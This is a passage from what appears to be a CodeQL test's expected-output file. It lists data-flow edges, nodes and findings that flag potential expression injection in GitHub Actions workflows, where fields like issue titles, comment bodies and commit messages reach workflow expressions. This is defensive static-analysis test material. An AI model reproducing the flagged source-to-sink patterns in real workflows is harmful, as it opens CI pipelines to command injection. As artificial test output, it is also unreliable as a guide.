.github/workflows/inter-job0.yml:22:9:26:6 | Uses Step: source | .github/workflows/inter-job0.yml:30:20:30:64 | steps.source.outputs.all_changed_files | -| .github/workflows/inter-job0.yml:26:9:34:2 | Uses Step: step [value] | .github/workflows/inter-job0.yml:15:20:15:50 | steps.step.outputs.value | -| .github/workflows/inter-job0.yml:30:20:30:64 | steps.source.outputs.all_changed_files | .github/workflows/inter-job0.yml:26:9:34:2 | Uses Step: step [value] | -| .github/workflows/inter-job1.yml:15:7:17:4 | Job outputs node [job_output] | .github/workflows/inter-job1.yml:43:20:43:53 | needs.job1.outputs.job_output | -| .github/workflows/inter-job1.yml:15:20:15:50 | steps.step.outputs.value | .github/workflows/inter-job1.yml:15:7:17:4 | Job outputs node [job_output] | -| .github/workflows/inter-job1.yml:22:9:26:6 | Uses Step: source | .github/workflows/inter-job1.yml:30:20:30:64 | 
steps.source.outputs.all_changed_files | -| .github/workflows/inter-job1.yml:26:9:34:2 | Uses Step: step [value] | .github/workflows/inter-job1.yml:15:20:15:50 | steps.step.outputs.value | -| .github/workflows/inter-job1.yml:30:20:30:64 | steps.source.outputs.all_changed_files | .github/workflows/inter-job1.yml:26:9:34:2 | Uses Step: step [value] | -| .github/workflows/inter-job2.yml:15:7:17:4 | Job outputs node [job_output] | .github/workflows/inter-job2.yml:45:20:45:53 | needs.job1.outputs.job_output | -| .github/workflows/inter-job2.yml:15:20:15:50 | steps.step.outputs.value | .github/workflows/inter-job2.yml:15:7:17:4 | Job outputs node [job_output] | -| .github/workflows/inter-job2.yml:22:9:26:6 | Uses Step: source | .github/workflows/inter-job2.yml:30:20:30:64 | steps.source.outputs.all_changed_files | -| .github/workflows/inter-job2.yml:26:9:34:2 | Uses Step: step [value] | .github/workflows/inter-job2.yml:15:20:15:50 | steps.step.outputs.value | -| .github/workflows/inter-job2.yml:30:20:30:64 | steps.source.outputs.all_changed_files | .github/workflows/inter-job2.yml:26:9:34:2 | Uses Step: step [value] | -| .github/workflows/inter-job4.yml:15:7:17:4 | Job outputs node [job_output] | .github/workflows/inter-job4.yml:44:20:44:53 | needs.job1.outputs.job_output | -| .github/workflows/inter-job4.yml:15:20:15:50 | steps.step.outputs.value | .github/workflows/inter-job4.yml:15:7:17:4 | Job outputs node [job_output] | -| .github/workflows/inter-job4.yml:22:9:26:6 | Uses Step: source | .github/workflows/inter-job4.yml:30:20:30:64 | steps.source.outputs.all_changed_files | -| .github/workflows/inter-job4.yml:26:9:34:2 | Uses Step: step [value] | .github/workflows/inter-job4.yml:15:20:15:50 | steps.step.outputs.value | -| .github/workflows/inter-job4.yml:30:20:30:64 | steps.source.outputs.all_changed_files | .github/workflows/inter-job4.yml:26:9:34:2 | Uses Step: step [value] | -| .github/workflows/issues.yaml:4:16:4:46 | github.event.issue.title | 
.github/workflows/issues.yaml:15:19:15:39 | env.global_env | -| .github/workflows/issues.yaml:10:17:10:47 | github.event.issue.title | .github/workflows/issues.yaml:17:19:17:36 | env.job_env | -| .github/workflows/issues.yaml:20:20:20:50 | github.event.issue.title | .github/workflows/issues.yaml:18:19:18:37 | env.step_env | -| .github/workflows/self_needs.yml:11:7:12:4 | Job outputs node [job_output] | .github/workflows/self_needs.yml:20:15:20:51 | needs.test1.outputs.job_output | -| .github/workflows/self_needs.yml:11:20:11:52 | steps.source.outputs.value | .github/workflows/self_needs.yml:11:7:12:4 | Job outputs node [job_output] | -| .github/workflows/self_needs.yml:13:9:19:6 | Uses Step: source [value] | .github/workflows/self_needs.yml:11:20:11:52 | steps.source.outputs.value | -| .github/workflows/self_needs.yml:13:9:19:6 | Uses Step: source [value] | .github/workflows/self_needs.yml:19:15:19:47 | steps.source.outputs.value | -| .github/workflows/self_needs.yml:16:20:16:64 | github.event['head_commit']['message'] | .github/workflows/self_needs.yml:13:9:19:6 | Uses Step: source [value] | -| .github/workflows/simple1.yml:8:9:14:6 | Uses Step: summary [value] | .github/workflows/simple1.yml:16:18:16:49 | steps.summary.outputs.value | -| .github/workflows/simple1.yml:11:20:11:58 | github.event.head_commit.message | .github/workflows/simple1.yml:8:9:14:6 | Uses Step: summary [value] | -| .github/workflows/simple2.yml:14:9:18:6 | Uses Step: source | .github/workflows/simple2.yml:22:20:22:64 | steps.source.outputs.all_changed_files | -| .github/workflows/simple2.yml:18:9:26:6 | Uses Step: step [value] | .github/workflows/simple2.yml:29:24:29:54 | steps.step.outputs.value | -| .github/workflows/simple2.yml:22:20:22:64 | steps.source.outputs.all_changed_files | .github/workflows/simple2.yml:18:9:26:6 | Uses Step: step [value] | -| .github/workflows/test.yml:8:7:10:4 | Job outputs node [job_output] | .github/workflows/test.yml:37:20:37:56 | 
needs.job1.outputs['job_output'] | -| .github/workflows/test.yml:8:20:8:50 | steps.step2.outputs.test | .github/workflows/test.yml:8:7:10:4 | Job outputs node [job_output] | -| .github/workflows/test.yml:12:9:18:6 | Uses Step: step0 [value] | .github/workflows/test.yml:20:18:20:48 | steps.step0.outputs.value | -| .github/workflows/test.yml:15:20:15:64 | github.event['head_commit']['message'] | .github/workflows/test.yml:12:9:18:6 | Uses Step: step0 [value] | -| .github/workflows/test.yml:18:9:24:6 | Run Step: step1 [MSG] | .github/workflows/test.yml:26:19:26:46 | steps.step1.outputs.MSG | -| .github/workflows/test.yml:20:18:20:48 | steps.step0.outputs.value | .github/workflows/test.yml:18:9:24:6 | Run Step: step1 [MSG] | -| .github/workflows/test.yml:24:9:29:2 | Run Step: step2 [test] | .github/workflows/test.yml:8:20:8:50 | steps.step2.outputs.test | -| .github/workflows/test.yml:26:19:26:46 | steps.step1.outputs.MSG | .github/workflows/test.yml:24:9:29:2 | Run Step: step2 [test] | -nodes -| .github/workflows/argus_case_study.yml:15:9:24:6 | Uses Step: remove_quotations [replaced] | semmle.label | Uses Step: remove_quotations [replaced] | -| .github/workflows/argus_case_study.yml:17:25:17:53 | github.event.issue.title | semmle.label | github.event.issue.title | -| .github/workflows/argus_case_study.yml:22:20:22:39 | env.ISSUE_TITLE | semmle.label | env.ISSUE_TITLE | -| .github/workflows/argus_case_study.yml:27:33:27:77 | steps.remove_quotations.outputs.replaced | semmle.label | steps.remove_quotations.outputs.replaced | -| .github/workflows/changed-files.yml:16:9:20:6 | Uses Step: changed-files | semmle.label | Uses Step: changed-files | -| .github/workflows/changed-files.yml:22:24:22:75 | steps.changed-files.outputs.all_changed_files | semmle.label | steps.changed-files.outputs.all_changed_files | -| .github/workflows/comment_issue.yml:9:15:9:46 | github.event.comment.body | semmle.label | github.event.comment.body | -| 
.github/workflows/comment_issue.yml:15:19:15:50 | github.event.comment.body | semmle.label | github.event.comment.body | -| .github/workflows/comment_issue.yml:16:19:16:48 | github.event.issue.body | semmle.label | github.event.issue.body | -| .github/workflows/comment_issue.yml:17:19:17:49 | github.event.issue.title | semmle.label | github.event.issue.title | -| .github/workflows/comment_issue_newline.yml:10:25:10:56 | github.event.comment.body | semmle.label | github.event.comment.body | -| .github/workflows/comment_issue_newline.yml:11:24:11:51 | github.event.issue.body | semmle.label | github.event.issue.body | -| .github/workflows/comment_issue_newline.yml:12:24:12:55 | github.event.comment.body | semmle.label | github.event.comment.body | -| .github/workflows/cross3.yml:27:7:37:4 | Uses Step: remove_quotations [replaced] | semmle.label | Uses Step: remove_quotations [replaced] | -| .github/workflows/cross3.yml:32:18:32:53 | github.event.commits[0].message | semmle.label | github.event.commits[0].message | -| .github/workflows/cross3.yml:39:31:39:75 | steps.remove_quotations.outputs.replaced | semmle.label | steps.remove_quotations.outputs.replaced | -| .github/workflows/cross3.yml:42:86:42:113 | env.ISSUE_BODY_PARSED | semmle.label | env.ISSUE_BODY_PARSED | -| .github/workflows/cross3.yml:53:89:53:107 | env.pr_message | semmle.label | env.pr_message | -| .github/workflows/cross3.yml:57:29:57:73 | steps.remove_quotations.outputs.replaced | semmle.label | steps.remove_quotations.outputs.replaced | -| .github/workflows/cross3.yml:68:11:68:38 | env.ISSUE_BODY_PARSED | semmle.label | env.ISSUE_BODY_PARSED | -| .github/workflows/discussion.yml:7:19:7:54 | github.event.discussion.title | semmle.label | github.event.discussion.title | -| .github/workflows/discussion.yml:8:19:8:53 | github.event.discussion.body | semmle.label | github.event.discussion.body | -| .github/workflows/discussion_comment.yml:7:19:7:54 | github.event.discussion.title | semmle.label | 
github.event.discussion.title | -| .github/workflows/discussion_comment.yml:8:19:8:53 | github.event.discussion.body | semmle.label | github.event.discussion.body | -| .github/workflows/discussion_comment.yml:9:19:9:50 | github.event.comment.body | semmle.label | github.event.comment.body | -| .github/workflows/gollum.yml:7:19:7:52 | github.event.pages[1].title | semmle.label | github.event.pages[1].title | -| .github/workflows/gollum.yml:8:19:8:53 | github.event.pages[11].title | semmle.label | github.event.pages[11].title | -| .github/workflows/gollum.yml:9:19:9:56 | github.event.pages[0].page_name | semmle.label | github.event.pages[0].page_name | -| .github/workflows/gollum.yml:10:19:10:59 | github.event.pages[2222].page_name | semmle.label | github.event.pages[2222].page_name | -| .github/workflows/image_link_generator.yml:15:9:22:6 | Run Step: extract-url [initial_url] | semmle.label | Run Step: extract-url [initial_url] | -| .github/workflows/image_link_generator.yml:18:18:18:49 | github.event.comment.body | semmle.label | github.event.comment.body | -| .github/workflows/image_link_generator.yml:22:9:28:6 | Run Step: curl [redirected_url] | semmle.label | Run Step: curl [redirected_url] | -| .github/workflows/image_link_generator.yml:25:25:25:68 | steps.extract-url.outputs.initial_url | semmle.label | steps.extract-url.outputs.initial_url | -| .github/workflows/image_link_generator.yml:28:9:35:6 | Run Step: trim-url [trimmed_url] | semmle.label | Run Step: trim-url [trimmed_url] | -| .github/workflows/image_link_generator.yml:31:28:31:67 | steps.curl.outputs.redirected_url | semmle.label | steps.curl.outputs.redirected_url | -| .github/workflows/image_link_generator.yml:37:85:37:125 | steps.trim-url.outputs.trimmed_url | semmle.label | steps.trim-url.outputs.trimmed_url | -| .github/workflows/inter-job0.yml:15:7:17:4 | Job outputs node [job_output] | semmle.label | Job outputs node [job_output] | -| .github/workflows/inter-job0.yml:15:20:15:50 | 
steps.step.outputs.value | semmle.label | steps.step.outputs.value | -| .github/workflows/inter-job0.yml:22:9:26:6 | Uses Step: source | semmle.label | Uses Step: source | -| .github/workflows/inter-job0.yml:26:9:34:2 | Uses Step: step [value] | semmle.label | Uses Step: step [value] | -| .github/workflows/inter-job0.yml:30:20:30:64 | steps.source.outputs.all_changed_files | semmle.label | steps.source.outputs.all_changed_files | -| .github/workflows/inter-job0.yml:43:20:43:53 | needs.job1.outputs.job_output | semmle.label | needs.job1.outputs.job_output | -| .github/workflows/inter-job1.yml:15:7:17:4 | Job outputs node [job_output] | semmle.label | Job outputs node [job_output] | -| .github/workflows/inter-job1.yml:15:20:15:50 | steps.step.outputs.value | semmle.label | steps.step.outputs.value | -| .github/workflows/inter-job1.yml:22:9:26:6 | Uses Step: source | semmle.label | Uses Step: source | -| .github/workflows/inter-job1.yml:26:9:34:2 | Uses Step: step [value] | semmle.label | Uses Step: step [value] | -| .github/workflows/inter-job1.yml:30:20:30:64 | steps.source.outputs.all_changed_files | semmle.label | steps.source.outputs.all_changed_files | -| .github/workflows/inter-job1.yml:43:20:43:53 | needs.job1.outputs.job_output | semmle.label | needs.job1.outputs.job_output | -| .github/workflows/inter-job2.yml:15:7:17:4 | Job outputs node [job_output] | semmle.label | Job outputs node [job_output] | -| .github/workflows/inter-job2.yml:15:20:15:50 | steps.step.outputs.value | semmle.label | steps.step.outputs.value | -| .github/workflows/inter-job2.yml:22:9:26:6 | Uses Step: source | semmle.label | Uses Step: source | -| .github/workflows/inter-job2.yml:26:9:34:2 | Uses Step: step [value] | semmle.label | Uses Step: step [value] | -| .github/workflows/inter-job2.yml:30:20:30:64 | steps.source.outputs.all_changed_files | semmle.label | steps.source.outputs.all_changed_files | -| .github/workflows/inter-job2.yml:45:20:45:53 | needs.job1.outputs.job_output | 
semmle.label | needs.job1.outputs.job_output | -| .github/workflows/inter-job4.yml:15:7:17:4 | Job outputs node [job_output] | semmle.label | Job outputs node [job_output] | -| .github/workflows/inter-job4.yml:15:20:15:50 | steps.step.outputs.value | semmle.label | steps.step.outputs.value | -| .github/workflows/inter-job4.yml:22:9:26:6 | Uses Step: source | semmle.label | Uses Step: source | -| .github/workflows/inter-job4.yml:26:9:34:2 | Uses Step: step [value] | semmle.label | Uses Step: step [value] | -| .github/workflows/inter-job4.yml:30:20:30:64 | steps.source.outputs.all_changed_files | semmle.label | steps.source.outputs.all_changed_files | -| .github/workflows/inter-job4.yml:44:20:44:53 | needs.job1.outputs.job_output | semmle.label | needs.job1.outputs.job_output | -| .github/workflows/issues.yaml:4:16:4:46 | github.event.issue.title | semmle.label | github.event.issue.title | -| .github/workflows/issues.yaml:10:17:10:47 | github.event.issue.title | semmle.label | github.event.issue.title | -| .github/workflows/issues.yaml:13:19:13:49 | github.event.issue.title | semmle.label | github.event.issue.title | -| .github/workflows/issues.yaml:14:19:14:48 | github.event.issue.body | semmle.label | github.event.issue.body | -| .github/workflows/issues.yaml:15:19:15:39 | env.global_env | semmle.label | env.global_env | -| .github/workflows/issues.yaml:17:19:17:36 | env.job_env | semmle.label | env.job_env | -| .github/workflows/issues.yaml:18:19:18:37 | env.step_env | semmle.label | env.step_env | -| .github/workflows/issues.yaml:20:20:20:50 | github.event.issue.title | semmle.label | github.event.issue.title | -| .github/workflows/pull_request_review.yml:7:19:7:56 | github.event.pull_request.title | semmle.label | github.event.pull_request.title | -| .github/workflows/pull_request_review.yml:8:19:8:55 | github.event.pull_request.body | semmle.label | github.event.pull_request.body | -| .github/workflows/pull_request_review.yml:9:19:9:61 | 
github.event.pull_request.head.label | semmle.label | github.event.pull_request.head.label | -| .github/workflows/pull_request_review.yml:10:19:10:75 | github.event.pull_request.head.repo.default_branch | semmle.label | github.event.pull_request.head.repo.default_branch | -| .github/workflows/pull_request_review.yml:11:19:11:72 | github.event.pull_request.head.repo.description | semmle.label | github.event.pull_request.head.repo.description | -| .github/workflows/pull_request_review.yml:12:19:12:69 | github.event.pull_request.head.repo.homepage | semmle.label | github.event.pull_request.head.repo.homepage | -| .github/workflows/pull_request_review.yml:13:19:13:59 | github.event.pull_request.head.ref | semmle.label | github.event.pull_request.head.ref | -| .github/workflows/pull_request_review.yml:14:19:14:49 | github.event.review.body | semmle.label | github.event.review.body | -| .github/workflows/pull_request_review_comment.yml:7:19:7:56 | github.event.pull_request.title | semmle.label | github.event.pull_request.title | -| .github/workflows/pull_request_review_comment.yml:8:19:8:55 | github.event.pull_request.body | semmle.label | github.event.pull_request.body | -| .github/workflows/pull_request_review_comment.yml:9:19:9:61 | github.event.pull_request.head.label | semmle.label | github.event.pull_request.head.label | -| .github/workflows/pull_request_review_comment.yml:10:19:10:75 | github.event.pull_request.head.repo.default_branch | semmle.label | github.event.pull_request.head.repo.default_branch | -| .github/workflows/pull_request_review_comment.yml:11:19:11:72 | github.event.pull_request.head.repo.description | semmle.label | github.event.pull_request.head.repo.description | -| .github/workflows/pull_request_review_comment.yml:12:19:12:69 | github.event.pull_request.head.repo.homepage | semmle.label | github.event.pull_request.head.repo.homepage | -| .github/workflows/pull_request_review_comment.yml:13:19:13:59 | github.event.pull_request.head.ref | 
semmle.label | github.event.pull_request.head.ref | -| .github/workflows/pull_request_review_comment.yml:14:19:14:50 | github.event.comment.body | semmle.label | github.event.comment.body | -| .github/workflows/pull_request_target.yml:7:19:7:49 | github.event.issue.title | semmle.label | github.event.issue.title | -| .github/workflows/pull_request_target.yml:8:19:8:48 | github.event.issue.body | semmle.label | github.event.issue.body | -| .github/workflows/pull_request_target.yml:9:19:9:56 | github.event.pull_request.title | semmle.label | github.event.pull_request.title | -| .github/workflows/pull_request_target.yml:10:19:10:55 | github.event.pull_request.body | semmle.label | github.event.pull_request.body | -| .github/workflows/pull_request_target.yml:11:19:11:61 | github.event.pull_request.head.label | semmle.label | github.event.pull_request.head.label | -| .github/workflows/pull_request_target.yml:12:19:12:75 | github.event.pull_request.head.repo.default_branch | semmle.label | github.event.pull_request.head.repo.default_branch | -| .github/workflows/pull_request_target.yml:13:19:13:72 | github.event.pull_request.head.repo.description | semmle.label | github.event.pull_request.head.repo.description | -| .github/workflows/pull_request_target.yml:14:19:14:69 | github.event.pull_request.head.repo.homepage | semmle.label | github.event.pull_request.head.repo.homepage | -| .github/workflows/pull_request_target.yml:15:19:15:59 | github.event.pull_request.head.ref | semmle.label | github.event.pull_request.head.ref | -| .github/workflows/pull_request_target.yml:16:19:16:40 | github.head_ref | semmle.label | github.head_ref | -| .github/workflows/push.yml:7:19:7:57 | github.event.commits[11].message | semmle.label | github.event.commits[11].message | -| .github/workflows/push.yml:8:19:8:62 | github.event.commits[11].author.email | semmle.label | github.event.commits[11].author.email | -| .github/workflows/push.yml:9:19:9:61 | github.event.commits[11].author.name | 
semmle.label | github.event.commits[11].author.name | -| .github/workflows/push.yml:10:19:10:57 | github.event.head_commit.message | semmle.label | github.event.head_commit.message | -| .github/workflows/push.yml:11:19:11:62 | github.event.head_commit.author.email | semmle.label | github.event.head_commit.author.email | -| .github/workflows/push.yml:12:19:12:61 | github.event.head_commit.author.name | semmle.label | github.event.head_commit.author.name | -| .github/workflows/push.yml:13:19:13:65 | github.event.head_commit.committer.email | semmle.label | github.event.head_commit.committer.email | -| .github/workflows/push.yml:14:19:14:64 | github.event.head_commit.committer.name | semmle.label | github.event.head_commit.committer.name | -| .github/workflows/push.yml:15:19:15:65 | github.event.commits[11].committer.email | semmle.label | github.event.commits[11].committer.email | -| .github/workflows/push.yml:16:19:16:64 | github.event.commits[11].committer.name | semmle.label | github.event.commits[11].committer.name | -| .github/workflows/self_needs.yml:11:7:12:4 | Job outputs node [job_output] | semmle.label | Job outputs node [job_output] | -| .github/workflows/self_needs.yml:11:20:11:52 | steps.source.outputs.value | semmle.label | steps.source.outputs.value | -| .github/workflows/self_needs.yml:13:9:19:6 | Uses Step: source [value] | semmle.label | Uses Step: source [value] | -| .github/workflows/self_needs.yml:16:20:16:64 | github.event['head_commit']['message'] | semmle.label | github.event['head_commit']['message'] | -| .github/workflows/self_needs.yml:19:15:19:47 | steps.source.outputs.value | semmle.label | steps.source.outputs.value | -| .github/workflows/self_needs.yml:20:15:20:51 | needs.test1.outputs.job_output | semmle.label | needs.test1.outputs.job_output | -| .github/workflows/simple1.yml:8:9:14:6 | Uses Step: summary [value] | semmle.label | Uses Step: summary [value] | -| .github/workflows/simple1.yml:11:20:11:58 | 
github.event.head_commit.message | semmle.label | github.event.head_commit.message | -| .github/workflows/simple1.yml:16:18:16:49 | steps.summary.outputs.value | semmle.label | steps.summary.outputs.value | -| .github/workflows/simple2.yml:14:9:18:6 | Uses Step: source | semmle.label | Uses Step: source | -| .github/workflows/simple2.yml:18:9:26:6 | Uses Step: step [value] | semmle.label | Uses Step: step [value] | -| .github/workflows/simple2.yml:22:20:22:64 | steps.source.outputs.all_changed_files | semmle.label | steps.source.outputs.all_changed_files | -| .github/workflows/simple2.yml:29:24:29:54 | steps.step.outputs.value | semmle.label | steps.step.outputs.value | -| .github/workflows/test.yml:8:7:10:4 | Job outputs node [job_output] | semmle.label | Job outputs node [job_output] | -| .github/workflows/test.yml:8:20:8:50 | steps.step2.outputs.test | semmle.label | steps.step2.outputs.test | -| .github/workflows/test.yml:12:9:18:6 | Uses Step: step0 [value] | semmle.label | Uses Step: step0 [value] | -| .github/workflows/test.yml:15:20:15:64 | github.event['head_commit']['message'] | semmle.label | github.event['head_commit']['message'] | -| .github/workflows/test.yml:18:9:24:6 | Run Step: step1 [MSG] | semmle.label | Run Step: step1 [MSG] | -| .github/workflows/test.yml:20:18:20:48 | steps.step0.outputs.value | semmle.label | steps.step0.outputs.value | -| .github/workflows/test.yml:24:9:29:2 | Run Step: step2 [test] | semmle.label | Run Step: step2 [test] | -| .github/workflows/test.yml:26:19:26:46 | steps.step1.outputs.MSG | semmle.label | steps.step1.outputs.MSG | -| .github/workflows/test.yml:37:20:37:56 | needs.job1.outputs['job_output'] | semmle.label | needs.job1.outputs['job_output'] | -| .github/workflows/workflow_run.yml:9:19:9:64 | github.event.workflow_run.display_title | semmle.label | github.event.workflow_run.display_title | -| .github/workflows/workflow_run.yml:10:19:10:70 | github.event.workflow_run.head_commit.message | semmle.label | 
github.event.workflow_run.head_commit.message | -| .github/workflows/workflow_run.yml:11:19:11:75 | github.event.workflow_run.head_commit.author.email | semmle.label | github.event.workflow_run.head_commit.author.email | -| .github/workflows/workflow_run.yml:12:19:12:74 | github.event.workflow_run.head_commit.author.name | semmle.label | github.event.workflow_run.head_commit.author.name | -| .github/workflows/workflow_run.yml:13:19:13:78 | github.event.workflow_run.head_commit.committer.email | semmle.label | github.event.workflow_run.head_commit.committer.email | -| .github/workflows/workflow_run.yml:14:19:14:77 | github.event.workflow_run.head_commit.committer.name | semmle.label | github.event.workflow_run.head_commit.committer.name | -| .github/workflows/workflow_run.yml:15:19:15:62 | github.event.workflow_run.head_branch | semmle.label | github.event.workflow_run.head_branch | -| .github/workflows/workflow_run.yml:16:19:16:78 | github.event.workflow_run.head_repository.description | semmle.label | github.event.workflow_run.head_repository.description | -| action1/action.yml:14:19:14:50 | github.event.comment.body | semmle.label | github.event.comment.body | -subpaths -#select -| .github/workflows/argus_case_study.yml:27:33:27:77 | steps.remove_quotations.outputs.replaced | .github/workflows/argus_case_study.yml:17:25:17:53 | github.event.issue.title | .github/workflows/argus_case_study.yml:27:33:27:77 | steps.remove_quotations.outputs.replaced | Potential expression injection in $@, which may be controlled by an external user. 
| .github/workflows/argus_case_study.yml:27:33:27:77 | steps.remove_quotations.outputs.replaced | ${{steps.remove_quotations.outputs.replaced}} | -| .github/workflows/changed-files.yml:22:24:22:75 | steps.changed-files.outputs.all_changed_files | .github/workflows/changed-files.yml:16:9:20:6 | Uses Step: changed-files | .github/workflows/changed-files.yml:22:24:22:75 | steps.changed-files.outputs.all_changed_files | Potential expression injection in $@, which may be controlled by an external user. | .github/workflows/changed-files.yml:22:24:22:75 | steps.changed-files.outputs.all_changed_files | ${{ steps.changed-files.outputs.all_changed_files }} | -| .github/workflows/comment_issue.yml:9:15:9:46 | github.event.comment.body | .github/workflows/comment_issue.yml:9:15:9:46 | github.event.comment.body | .github/workflows/comment_issue.yml:9:15:9:46 | github.event.comment.body | Potential expression injection in $@, which may be controlled by an external user. | .github/workflows/comment_issue.yml:9:15:9:46 | github.event.comment.body | ${{ github.event.comment.body }} | -| .github/workflows/comment_issue.yml:15:19:15:50 | github.event.comment.body | .github/workflows/comment_issue.yml:15:19:15:50 | github.event.comment.body | .github/workflows/comment_issue.yml:15:19:15:50 | github.event.comment.body | Potential expression injection in $@, which may be controlled by an external user. | .github/workflows/comment_issue.yml:15:19:15:50 | github.event.comment.body | ${{ github.event.comment.body }} | -| .github/workflows/comment_issue.yml:16:19:16:48 | github.event.issue.body | .github/workflows/comment_issue.yml:16:19:16:48 | github.event.issue.body | .github/workflows/comment_issue.yml:16:19:16:48 | github.event.issue.body | Potential expression injection in $@, which may be controlled by an external user. 
| .github/workflows/comment_issue.yml:16:19:16:48 | github.event.issue.body | ${{ github.event.issue.body }} | -| .github/workflows/comment_issue.yml:17:19:17:49 | github.event.issue.title | .github/workflows/comment_issue.yml:17:19:17:49 | github.event.issue.title | .github/workflows/comment_issue.yml:17:19:17:49 | github.event.issue.title | Potential expression injection in $@, which may be controlled by an external user. | .github/workflows/comment_issue.yml:17:19:17:49 | github.event.issue.title | ${{ github.event.issue.title }} | -| .github/workflows/comment_issue_newline.yml:10:25:10:56 | github.event.comment.body | .github/workflows/comment_issue_newline.yml:10:25:10:56 | github.event.comment.body | .github/workflows/comment_issue_newline.yml:10:25:10:56 | github.event.comment.body | Potential expression injection in $@, which may be controlled by an external user. | .github/workflows/comment_issue_newline.yml:10:25:10:56 | github.event.comment.body | ${{ github.event.comment.body }} | -| .github/workflows/comment_issue_newline.yml:11:24:11:51 | github.event.issue.body | .github/workflows/comment_issue_newline.yml:11:24:11:51 | github.event.issue.body | .github/workflows/comment_issue_newline.yml:11:24:11:51 | github.event.issue.body | Potential expression injection in $@, which may be controlled by an external user. | .github/workflows/comment_issue_newline.yml:11:24:11:51 | github.event.issue.body | ${{github.event.issue.body}} | -| .github/workflows/comment_issue_newline.yml:12:24:12:55 | github.event.comment.body | .github/workflows/comment_issue_newline.yml:12:24:12:55 | github.event.comment.body | .github/workflows/comment_issue_newline.yml:12:24:12:55 | github.event.comment.body | Potential expression injection in $@, which may be controlled by an external user. 
| .github/workflows/comment_issue_newline.yml:12:24:12:55 | github.event.comment.body | ${{ github.event.comment.body }} | -| .github/workflows/cross3.yml:42:86:42:113 | env.ISSUE_BODY_PARSED | .github/workflows/cross3.yml:32:18:32:53 | github.event.commits[0].message | .github/workflows/cross3.yml:42:86:42:113 | env.ISSUE_BODY_PARSED | Potential expression injection in $@, which may be controlled by an external user. | .github/workflows/cross3.yml:42:86:42:113 | env.ISSUE_BODY_PARSED | ${{ env.ISSUE_BODY_PARSED }} | -| .github/workflows/cross3.yml:53:89:53:107 | env.pr_message | .github/workflows/cross3.yml:32:18:32:53 | github.event.commits[0].message | .github/workflows/cross3.yml:53:89:53:107 | env.pr_message | Potential expression injection in $@, which may be controlled by an external user. | .github/workflows/cross3.yml:53:89:53:107 | env.pr_message | ${{env.pr_message}} | -| .github/workflows/discussion.yml:7:19:7:54 | github.event.discussion.title | .github/workflows/discussion.yml:7:19:7:54 | github.event.discussion.title | .github/workflows/discussion.yml:7:19:7:54 | github.event.discussion.title | Potential expression injection in $@, which may be controlled by an external user. | .github/workflows/discussion.yml:7:19:7:54 | github.event.discussion.title | ${{ github.event.discussion.title }} | -| .github/workflows/discussion.yml:8:19:8:53 | github.event.discussion.body | .github/workflows/discussion.yml:8:19:8:53 | github.event.discussion.body | .github/workflows/discussion.yml:8:19:8:53 | github.event.discussion.body | Potential expression injection in $@, which may be controlled by an external user. 
| .github/workflows/discussion.yml:8:19:8:53 | github.event.discussion.body | ${{ github.event.discussion.body }} | -| .github/workflows/discussion_comment.yml:7:19:7:54 | github.event.discussion.title | .github/workflows/discussion_comment.yml:7:19:7:54 | github.event.discussion.title | .github/workflows/discussion_comment.yml:7:19:7:54 | github.event.discussion.title | Potential expression injection in $@, which may be controlled by an external user. | .github/workflows/discussion_comment.yml:7:19:7:54 | github.event.discussion.title | ${{ github.event.discussion.title }} | -| .github/workflows/discussion_comment.yml:8:19:8:53 | github.event.discussion.body | .github/workflows/discussion_comment.yml:8:19:8:53 | github.event.discussion.body | .github/workflows/discussion_comment.yml:8:19:8:53 | github.event.discussion.body | Potential expression injection in $@, which may be controlled by an external user. | .github/workflows/discussion_comment.yml:8:19:8:53 | github.event.discussion.body | ${{ github.event.discussion.body }} | -| .github/workflows/discussion_comment.yml:9:19:9:50 | github.event.comment.body | .github/workflows/discussion_comment.yml:9:19:9:50 | github.event.comment.body | .github/workflows/discussion_comment.yml:9:19:9:50 | github.event.comment.body | Potential expression injection in $@, which may be controlled by an external user. | .github/workflows/discussion_comment.yml:9:19:9:50 | github.event.comment.body | ${{ github.event.comment.body }} | -| .github/workflows/gollum.yml:7:19:7:52 | github.event.pages[1].title | .github/workflows/gollum.yml:7:19:7:52 | github.event.pages[1].title | .github/workflows/gollum.yml:7:19:7:52 | github.event.pages[1].title | Potential expression injection in $@, which may be controlled by an external user. 
| .github/workflows/gollum.yml:7:19:7:52 | github.event.pages[1].title | ${{ github.event.pages[1].title }} | -| .github/workflows/gollum.yml:8:19:8:53 | github.event.pages[11].title | .github/workflows/gollum.yml:8:19:8:53 | github.event.pages[11].title | .github/workflows/gollum.yml:8:19:8:53 | github.event.pages[11].title | Potential expression injection in $@, which may be controlled by an external user. | .github/workflows/gollum.yml:8:19:8:53 | github.event.pages[11].title | ${{ github.event.pages[11].title }} | -| .github/workflows/gollum.yml:9:19:9:56 | github.event.pages[0].page_name | .github/workflows/gollum.yml:9:19:9:56 | github.event.pages[0].page_name | .github/workflows/gollum.yml:9:19:9:56 | github.event.pages[0].page_name | Potential expression injection in $@, which may be controlled by an external user. | .github/workflows/gollum.yml:9:19:9:56 | github.event.pages[0].page_name | ${{ github.event.pages[0].page_name }} | -| .github/workflows/gollum.yml:10:19:10:59 | github.event.pages[2222].page_name | .github/workflows/gollum.yml:10:19:10:59 | github.event.pages[2222].page_name | .github/workflows/gollum.yml:10:19:10:59 | github.event.pages[2222].page_name | Potential expression injection in $@, which may be controlled by an external user. | .github/workflows/gollum.yml:10:19:10:59 | github.event.pages[2222].page_name | ${{ github.event.pages[2222].page_name }} | -| .github/workflows/image_link_generator.yml:37:85:37:125 | steps.trim-url.outputs.trimmed_url | .github/workflows/image_link_generator.yml:18:18:18:49 | github.event.comment.body | .github/workflows/image_link_generator.yml:37:85:37:125 | steps.trim-url.outputs.trimmed_url | Potential expression injection in $@, which may be controlled by an external user. 
